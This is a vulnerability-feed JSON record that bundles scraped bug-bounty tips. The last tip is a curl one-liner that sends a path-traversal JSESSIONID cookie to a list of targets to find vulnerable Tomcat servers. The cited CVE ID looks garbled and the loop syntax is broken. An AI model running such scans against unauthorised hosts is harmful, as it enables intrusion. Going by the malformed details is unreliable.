{"uuid": "49f8b4d1-a4d4-4eb2-92c3-b8f684b4db60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-948444", "type": "seen", "source": "https://t.me/bhhub/27", "content": "#BugBountyTips of the Day\nI just published about why getting too many Duplicates in Bug Hunting and how can I overcome that #bugbounty #bugbountytips #infosec @Alra3ees @sillydadddy @stokfredrik @theXSSrat #100DaysOfCode   https://t.co/GwFkH5IJrj\n---\nNew tool release! urlhunter - a recon tool that allows searching on URLs that are exposed via shortener services such as bitly and googl #BugBounty #bugbountytips   https://t.co/ksmoxBPbAT\n---\nImportant message to all bug bounty hunters!   #bugbountytip #Pentesting #Security #Hacking  https://t.co/m6Mers7LwR\n---\nloading a big bounty \ud83d\ude0e #tips mix between  1)Amass-Httpx-Nuclei 2)Dirsearch with specific wordlist 3)Github search in Language bash and python   #BugBounty #bugbountytips  https://t.co/MSTYvt4RPs\n---\nRank: 229 worked for more than a year on bugcrowd. never exposed or chetaed any bugcrowd system. is arguing about  priority to progroam owner crime? support and some nice bugcrowd community guys dont care at all. @Bugcrowd #bugbounty  https://t.co/5CzVLwATd5\n---\n1) #CVE-2020-948444 #bug #exploit #BugBounty   cat targets.txt | while read host do;do curl --insecure --silent -X GET $host/index.jsp -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' | grep -qs \"PersistentManagerBase\" && \\printf \"$host \\033[0;31mCVE-2020-948444\\n\"", "creation_timestamp": "2020-11-23T13:37:04.000000Z"}